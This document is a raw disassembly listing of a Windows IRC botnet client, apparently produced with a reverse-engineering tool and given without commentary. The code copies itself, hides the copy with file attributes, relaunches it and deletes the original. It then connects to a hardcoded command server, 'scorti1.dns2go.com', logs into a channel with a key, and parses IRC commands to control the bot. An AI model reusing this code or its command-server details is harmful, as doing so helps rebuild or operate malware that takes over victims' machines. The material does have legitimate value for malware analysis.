push ebx
push eax
lea eax, [ebp+var_2EC]
xor edi, edi
push eax
loc_40CCE9: ; CODE XREF: sub_40CB17+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_40CD22
call ds:dword_42206C ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40CD22
cmp eax, 20h
jz short loc_40CD03
cmp eax, 5
jnz short loc_40CD22
loc_40CD03: ; CODE XREF: sub_40CB17+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_422054 ; Sleep
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
jmp short loc_40CCE9
; ---------------------------------------------------------------------------
loc_40CD22: ; CODE XREF: sub_40CB17+1D6�j
; sub_40CB17+1E0�j ...
lea eax, [ebp+var_1E8]
push eax
call sub_4091C2
pop ecx
lea eax, [ebp+var_1E8]
push 7
push eax
call ds:dword_422108 ; SetFileAttributesA
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_415500
push 44h
lea eax, [ebp+var_64]
pop esi
push esi
push ebx
push eax
call sub_415500
add esp, 18h
mov [ebp+var_64], esi
mov [ebp+var_58], offset byte_4325D8
mov [ebp+var_34], bx
push 1
pop esi
mov [ebp+var_38], esi
call ds:dword_422140 ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_4220DC ; OpenProcess
lea ecx, [ebp+var_2EC]
push ecx
push eax
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_988]
push offset dword_42AED0
push eax
call sub_415480
add esp, 14h
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_3F0]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+var_1E8]
push eax
call ds:dword_422104 ; CreateProcessA
test eax, eax
jz short loc_40CDFA
push 0C8h
call ds:dword_422054 ; Sleep
push [ebp+var_1C]
mov esi, ds:off_422074
call esi ; sub_4DB3D5
push [ebp+var_18]
call esi ; sub_4DB3D5
call ds:dword_4363C8 ; WSACleanup
push ebx
call ds:off_42212C
loc_40CDFA: ; CODE XREF: sub_40CB17+137�j
; sub_40CB17+2B9�j
cmp ds:dword_4C90A0, 2
jle short loc_40CE46
mov eax, ds:dword_4C90A4
push dword ptr [eax+4]
call sub_4159EF
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_422148 ; WaitForSingleObject
push esi
call ds:off_422074
mov eax, ds:dword_4C90A4
cmp [eax+8], ebx
jz short loc_40CE46
push 7D0h
call ds:dword_422054 ; Sleep
mov eax, ds:dword_4C90A4
push dword ptr [eax+8]
call ds:dword_42213C ; DeleteFileA
loc_40CE46: ; CODE XREF: sub_40CB17+2EA�j
; sub_40CB17+314�j
cmp ds:dword_42ACD8, ebx
jz short loc_40CE63
cmp ds:dword_436538, ebx
jnz short loc_40CE63
lea eax, [ebp+var_5F4]
push eax
call sub_40A7C2
pop ecx
loc_40CE63: ; CODE XREF: sub_40CB17+335�j
; sub_40CB17+33D�j
lea eax, [ebp+var_E4]
push offset dword_42AEA8
push eax
call sub_415480
push ebx
lea eax, [ebp+var_E4]
push ebx
push eax
call sub_414F2C
lea eax, [ebp+var_E4]
push eax
call sub_40A5B3
push 0B80h
push ebx
push offset dword_43B140
call sub_415500
call sub_4154DC
push 7Fh
push offset aScorti1_dns2go ; "scorti1.dns2go.com"
push offset dword_4C8CCC
mov ds:dword_4C8E40, ebx
call sub_416D30
mov eax, ds:dword_42ACB8
push 3Fh
mov edi, offset dword_4C8D4C
push offset aFaak ; "#faak#"
push edi
mov ds:dword_4C8E1C, eax
call sub_416D30
push 3Fh
mov esi, offset dword_4C8D8C
push offset aSaad_ ; "saad."
push esi
call sub_416D30
add esp, 48h
mov ds:dword_4C8E20, ebx
loc_40CEF1: ; CODE XREF: sub_40CB17+480�j
; sub_40CB17+48B�j ...
mov [ebp+var_4], ebx
loc_40CEF4: ; CODE XREF: sub_40CB17+434�j
cmp ds:dword_436550, ebx
jnz short loc_40CF12
lea eax, [ebp+var_20]
push ebx
push eax
call ds:dword_4363AC ; InternetGetConnectedState
test eax, eax
jnz short loc_40CF12
push 7530h
jmp short loc_40CF3E
; ---------------------------------------------------------------------------
loc_40CF12: ; CODE XREF: sub_40CB17+3E3�j
; sub_40CB17+3F2�j
push offset dword_4C8CC8
mov ds:dword_4C8E3C, ebx
call sub_40D000
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40CFEC
cmp ds:dword_4C8E3C, ebx
jz short loc_40CF39
dec [ebp+var_4]
loc_40CF39: ; CODE XREF: sub_40CB17+41D�j
push 0BB8h
loc_40CF3E: ; CODE XREF: sub_40CB17+3F9�j
call ds:dword_422054 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_40CEF4
cmp [ebp+var_8], 2
jz loc_40CFEC
cmp [ebp+var_C], ebx
jz short loc_40CF9C
push 7Fh
push offset aScorti1_dns2go ; "scorti1.dns2go.com"
push offset dword_4C8CCC
call sub_416D30
mov eax, ds:dword_42ACB8
push 3Fh
push offset aFaak ; "#faak#"
push edi
mov ds:dword_4C8E1C, eax
call sub_416D30
push 3Fh
push offset aSaad_ ; "saad."
push esi
call sub_416D30
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40CEF1
; ---------------------------------------------------------------------------
loc_40CF9C: ; CODE XREF: sub_40CB17+443�j
cmp ds:byte_42AD68, bl
jz loc_40CEF1
push 7Fh
push offset byte_42AD68
push offset dword_4C8CCC
call sub_416D30
mov eax, ds:dword_42ACBC
push 3Fh
push offset aFaak_0 ; "#faak#"
push edi
mov ds:dword_4C8E1C, eax
call sub_416D30
push 3Fh
push offset aSaad__0 ; "saad."
push esi
call sub_416D30
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40CEF1
; ---------------------------------------------------------------------------
loc_40CFEC: ; CODE XREF: sub_40CB17+411�j
; sub_40CB17+43A�j
call sub_4150F5
loc_40CFF1: ; CODE XREF: sub_40CB17+A1�j
; sub_40CB17+B1�j
call ds:dword_4363C8 ; WSACleanup
loc_40CFF7: ; CODE XREF: sub_40CB17+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40CB17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D000 proc near ; CODE XREF: sub_40CB17+406�p
; DATA XREF: sub_40D2E0+3B0C�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_40D025: ; CODE XREF: sub_40D000+E6�j
; sub_40D000+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call ds:dword_436468 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_409410
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40D152
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_415500
push 0
lea eax, [ebp+var_2C]
push ds:dword_4C8E30
push ds:dword_42ACE4
push eax
call sub_41416F
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_43BED8
push edi
push eax
call sub_416D30
add esp, 28h
push 6
push 1
push 2
call ds:dword_4364E8 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov ds:dword_43BECC[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_436410 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40D0EB
push esi
call ds:dword_436500 ; closesocket
call sub_409439
push 7D0h
loc_40D0E0: ; CODE XREF: sub_40D000+146�j
call ds:dword_422054 ; Sleep
jmp loc_40D025
; ---------------------------------------------------------------------------
loc_40D0EB: ; CODE XREF: sub_40D000+CD�j
lea eax, [ebp+var_18C]
push eax
push offset dword_42AEDC
call sub_40A627
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40D168
add esp, 28h
mov edi, eax
push esi
call ds:dword_436500 ; closesocket
test edi, edi
jz loc_40D025
cmp edi, 1
jnz short loc_40D148
push 0DBBA0h
jmp short loc_40D0E0
; ---------------------------------------------------------------------------
loc_40D148: ; CODE XREF: sub_40D000+13F�j
cmp edi, 2
jz short loc_40D156
jmp loc_40D025
; ---------------------------------------------------------------------------
loc_40D152: ; CODE XREF: sub_40D000+5A�j
xor eax, eax
jmp short loc_40D162
; ---------------------------------------------------------------------------
loc_40D156: ; CODE XREF: sub_40D000+14B�j
push [ebp+var_34]
call sub_415248
pop ecx
push 2
pop eax
loc_40D162: ; CODE XREF: sub_40D000+154�j
pop edi
pop esi
leave
retn 4
sub_40D000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D168 proc near ; CODE XREF: sub_40D000+123�p
var_1A10 = byte ptr -1A10h
var_A10 = byte ptr -0A10h
var_240 = byte ptr -240h
var_1A0 = byte ptr -1A0h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A10h
call sub_415D00
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+var_1A0]
pop ecx
loc_40D186: ; CODE XREF: sub_40D168+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_40D186
cmp ds:byte_4C8E38, bl
jz short loc_40D1AD
push offset byte_4C8E38
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_40BAA1
add esp, 0Ch
loc_40D1AD: ; CODE XREF: sub_40D168+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_41416F
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_415480
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40D217
push [ebp+arg_0]
call ds:dword_436500 ; closesocket
push 1388h
call ds:dword_422054 ; Sleep
loc_40D210: ; CODE XREF: sub_40D168+D9�j
; sub_40D168+153�j
xor eax, eax
loc_40D212: ; CODE XREF: sub_40D168+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D217: ; CODE XREF: sub_40D168+92�j
; sub_40D168+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A10]
push esi
push ebx
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_1A10]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_436480 ; recv
test eax, eax
jle short loc_40D210
lea eax, [ebp+var_A10]
push eax
lea eax, [ebp+var_1A10]
push eax
call sub_408EAE
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_40D217
lea edi, [ebp+var_A10]
loc_40D268: ; CODE XREF: sub_40D168+165�j
push 1
pop esi
loc_40D26B: ; CODE XREF: sub_40D168+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_240]
push eax
lea eax, [ebp+var_1A0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_40D2E0
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_40D2AE
push 7D0h
call ds:dword_422054 ; Sleep
jmp short loc_40D26B
; ---------------------------------------------------------------------------
loc_40D2AE: ; CODE XREF: sub_40D168+137�j
cmp esi, 0FFFFFFFDh
jz short loc_40D2D8
cmp esi, 0FFFFFFFEh
jz short loc_40D2D4
cmp esi, 0FFFFFFFFh
jz loc_40D210
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_40D268
jmp loc_40D217
; ---------------------------------------------------------------------------
loc_40D2D4: ; CODE XREF: sub_40D168+14E�j
push 1
jmp short loc_40D2DA
; ---------------------------------------------------------------------------
loc_40D2D8: ; CODE XREF: sub_40D168+149�j
push 2
loc_40D2DA: ; CODE XREF: sub_40D168+16E�j
pop eax
jmp loc_40D212
sub_40D168 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D2E0 proc near ; CODE XREF: sub_40D168+12A�p
var_15B0 = byte ptr -15B0h
var_11B0 = byte ptr -11B0h
var_FB0 = byte ptr -0FB0h
var_DB0 = byte ptr -0DB0h
var_CB0 = byte ptr -0CB0h
var_CAC = byte ptr -0CACh
var_BAC = byte ptr -0BACh
var_BA8 = byte ptr -0BA8h
var_AA8 = byte ptr -0AA8h
var_A28 = byte ptr -0A28h
var_9C7 = byte ptr -9C7h
var_9C6 = byte ptr -9C6h
var_9C4 = byte ptr -9C4h
var_9C3 = byte ptr -9C3h
var_9BA = byte ptr -9BAh
var_9B8 = byte ptr -9B8h
var_9B6 = byte ptr -9B6h
var_9B5 = byte ptr -9B5h
var_928 = byte ptr -928h
var_90C = dword ptr -90Ch
var_908 = byte ptr -908h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
var_7FC = byte ptr -7FCh
var_7F8 = dword ptr -7F8h
var_7F4 = byte ptr -7F4h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = byte ptr -7E8h
var_780 = byte ptr -780h
var_774 = byte ptr -774h
var_770 = dword ptr -770h
var_76C = byte ptr -76Ch
var_768 = byte ptr -768h
var_75C = byte ptr -75Ch
var_73C = dword ptr -73Ch
var_738 = byte ptr -738h
var_710 = dword ptr -710h
var_708 = byte ptr -708h
var_6FC = dword ptr -6FCh
var_6F8 = byte ptr -6F8h
var_6F4 = byte ptr -6F4h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_6E8 = byte ptr -6E8h
var_6B8 = byte ptr -6B8h
var_681 = byte ptr -681h
var_680 = byte ptr -680h
var_678 = byte ptr -678h
var_670 = byte ptr -670h
var_66C = byte ptr -66Ch
var_668 = byte ptr -668h
var_5F8 = byte ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_570 = dword ptr -570h
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = byte ptr -55Ch
var_50C = dword ptr -50Ch
var_508 = byte ptr -508h
var_504 = dword ptr -504h
var_500 = byte ptr -500h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = byte ptr -4E8h
var_4C0 = byte ptr -4C0h
var_4A0 = dword ptr -4A0h
var_488 = byte ptr -488h
var_480 = dword ptr -480h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = dword ptr -470h
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = byte ptr -45Ch
var_458 = byte ptr -458h
var_444 = byte ptr -444h
var_434 = byte ptr -434h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_40C = dword ptr -40Ch
var_408 = byte ptr -408h
var_3FC = byte ptr -3FCh
var_3F8 = byte ptr -3F8h
var_3D8 = byte ptr -3D8h
var_3B4 = byte ptr -3B4h
var_398 = byte ptr -398h
var_388 = byte ptr -388h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2EC = word ptr -2ECh
var_2EA = word ptr -2EAh
var_2E8 = dword ptr -2E8h
var_2DC = byte ptr -2DCh
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_54 = byte ptr -54h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 15B0h
call sub_415D00
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
mov [ebp+var_C0], 3
mov [ebp+var_10], ebx
mov [ebp+var_AC], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_DC], ebx
call sub_415500
push 1Bh
lea eax, [ebp+var_928]
push [ebp+arg_10]
push eax
call sub_416D30
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_40D6A7
push esi
lea eax, [ebp+var_FB0]
push ebx
push eax
call sub_415500
dec esi
lea eax, [ebp+var_FB0]
push esi
push [ebp+arg_0]
push eax
call sub_416D30
lea eax, [ebp+var_FB0]
push offset asc_42E574 ; " :"
push eax
call sub_415A50
mov [ebp+var_C], eax
lea eax, [ebp+var_FB0]
push esi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_416D30
mov esi, offset asc_425D24 ; " "
lea eax, [ebp+var_11B0]
push esi
push eax
call sub_416C8F
add esp, 34h
mov [ebp+var_94], eax
lea edi, [ebp+var_90]
mov [ebp+var_BC], 1Fh
loc_40D3B3: ; CODE XREF: sub_40D2E0+E7�j
push esi
push ebx
call sub_416C8F
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_BC]
pop ecx
jnz short loc_40D3B3
mov esi, [ebp+var_94]
cmp esi, ebx
jz loc_40D6A7
cmp [ebp+var_90], ebx
jz loc_40D6A7
push 100h
lea eax, [ebp+var_A28]
push ebx
push eax
call sub_415500
add esp, 0Ch
lea ecx, [ebp+var_18]
push 1Fh
pop edx
push 1
pop edi
loc_40D401: ; CODE XREF: sub_40D2E0+153�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_40D42D
cmp byte ptr [eax], 2Dh
jnz short loc_40D435
cmp [eax+2], bl
jnz short loc_40D435
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_A28], 1
mov esi, [ebp+var_94]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_40D42D: ; CODE XREF: sub_40D2E0+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_40D401
loc_40D435: ; CODE XREF: sub_40D2E0+12A�j
; sub_40D2E0+12F�j
cmp [ebp+var_9B5], bl
jz short loc_40D440
mov [ebp+var_8], edi
loc_40D440: ; CODE XREF: sub_40D2E0+15B�j
cmp [ebp+var_9BA], bl
jz short loc_40D44E
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_40D44E: ; CODE XREF: sub_40D2E0+166�j
cmp byte ptr [esi], 0Ah
jz short loc_40D488
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_416D30
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_D8]
push eax
call sub_416D30
lea eax, [ebp+var_D8]
push offset asc_42E570 ; "!"
push eax
call sub_416C8F
add esp, 20h
loc_40D488: ; CODE XREF: sub_40D2E0+171�j
push esi
push offset aPing ; "PING"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D4D9
push [ebp+var_90]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_40D57D
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 10h
jmp loc_40D57D
; ---------------------------------------------------------------------------
loc_40D4D9: ; CODE XREF: sub_40D2E0+1B7�j
mov esi, [ebp+var_90]
push esi
push offset a001 ; "001"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413541
push esi
push offset a005 ; "005"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413541
push esi
push offset a302 ; "302"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D541
push offset a@ ; "@"
push [ebp+var_88]
call sub_415A50
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40D57D
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_416D30
jmp short loc_40D57A
; ---------------------------------------------------------------------------
loc_40D541: ; CODE XREF: sub_40D2E0+238�j
push esi
push offset a433 ; "433"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D584
push ebx
push ds:dword_4C8E30
push ds:dword_42ACE4
push [ebp+arg_10]
call sub_41416F
add esp, 10h
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
loc_40D57A: ; CODE XREF: sub_40D2E0+25F�j
add esp, 0Ch
loc_40D57D: ; CODE XREF: sub_40D2E0+1D8�j
; sub_40D2E0+1F4�j ...
mov eax, edi
jmp loc_40D6AA
; ---------------------------------------------------------------------------
loc_40D584: ; CODE XREF: sub_40D2E0+270�j
mov esi, [ebp+arg_18]
mov [ebp+var_BC], 2
mov edi, 80h
loc_40D596: ; CODE XREF: sub_40D2E0+2DB�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D5B3
mov [ebp+var_AC], 1
loc_40D5B3: ; CODE XREF: sub_40D2E0+2C7�j
add esi, edi
dec [ebp+var_BC]
jnz short loc_40D596
mov esi, [ebp+var_90]
push esi
push offset aKick ; "KICK"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40D6AF
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 2
loc_40D5E2: ; CODE XREF: sub_40D2E0+392�j
cmp [esi], bl
jz loc_40D66D
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_416D30
lea eax, [ebp+var_D8]
add esp, 0Ch
test eax, eax
jz short loc_40D66D
cmp [ebp+var_88], ebx
jz short loc_40D66D
push [ebp+var_88]
lea eax, [ebp+var_D8]
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D66D
lea eax, [ebp+var_D8]
mov [esi], bl
push eax
lea eax, [ebp+var_2DC]
push offset dword_42E4F4
push eax
call sub_415480
add esp, 0Ch
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_40BAA1
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
add esp, 14h
loc_40D66D: ; CODE XREF: sub_40D2E0+304�j
; sub_40D2E0+324�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_40D5E2
push [ebp+var_88]
push [ebp+arg_10]
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D6A7
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_40D69C: ; CODE XREF: sub_40D2E0+618�j
; sub_40D2E0+978�j
push [ebp+arg_4]
call sub_40BAA1
loc_40D6A4: ; CODE XREF: sub_40D2E0+57D8�j
; sub_40D2E0+57F5�j ...
add esp, 10h
loc_40D6A7: ; CODE XREF: sub_40D2E0+5B�j
; sub_40D2E0+F1�j ...
push 1
loc_40D6A9: ; CODE XREF: sub_40D2E0+5CEB�j
pop eax
loc_40D6AA: ; CODE XREF: sub_40D2E0+29F�j
; sub_40D2E0+229D�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D6AF: ; CODE XREF: sub_40D2E0+2F2�j
push esi
push offset aNick ; "NICK"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40D805
mov eax, [ebp+var_8C]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 2
mov [ebp+arg_24], eax
loc_40D6D8: ; CODE XREF: sub_40D2E0+44A�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D725
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_417070
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_40D725
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_415B90
push [ebp+arg_1C]
push edi
call sub_415BA0
add esp, 10h
mov edi, 80h
loc_40D725: ; CODE XREF: sub_40D2E0+409�j
; sub_40D2E0+420�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_40D6D8
lea eax, [ebp+var_D8]
test eax, eax
jz loc_40D6A7
cmp [ebp+arg_24], ebx
jz loc_40D6A7
push [ebp+arg_10]
lea eax, [ebp+var_D8]
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D76D
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_416D30
add esp, 0Ch
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_40D76D: ; CODE XREF: sub_40D2E0+476�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40D772: ; CODE XREF: sub_40D2E0+4B3�j
cmp [edi], bl
jz short loc_40D789
lea eax, [ebp+var_AA8]
push eax
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40D79A
loc_40D789: ; CODE XREF: sub_40D2E0+494�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40D772
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_40D79A: ; CODE XREF: sub_40D2E0+4A7�j
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_417070
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz loc_40D6A7
push eax
call sub_415C80
push [ebp+arg_24]
mov edi, eax
call sub_415C80
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja loc_40D6A7
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS_1 ; ":%s%s"
push esi
call sub_415480
push ebx
lea eax, [ebp+var_4C0]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40BAE7
add esp, 24h
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_40D805: ; CODE XREF: sub_40D2E0+3DE�j
push esi
push offset aPart ; "PART"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40D827
push esi
push offset aQuit ; "QUIT"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D84E
loc_40D827: ; CODE XREF: sub_40D2E0+534�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40D82C: ; CODE XREF: sub_40D2E0+56C�j
cmp [edi], bl
jz short loc_40D842
push [ebp+var_94]
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40D89C
loc_40D842: ; CODE XREF: sub_40D2E0+54E�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40D82C
loc_40D84E: ; CODE XREF: sub_40D2E0+545�j
push [ebp+var_90]
push offset a353 ; "353"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40D8FD
push [ebp+var_84]
push [ebp+arg_8]
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40D885
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40D885: ; CODE XREF: sub_40D2E0+59A�j
push [ebp+var_84]
push offset dword_42E498
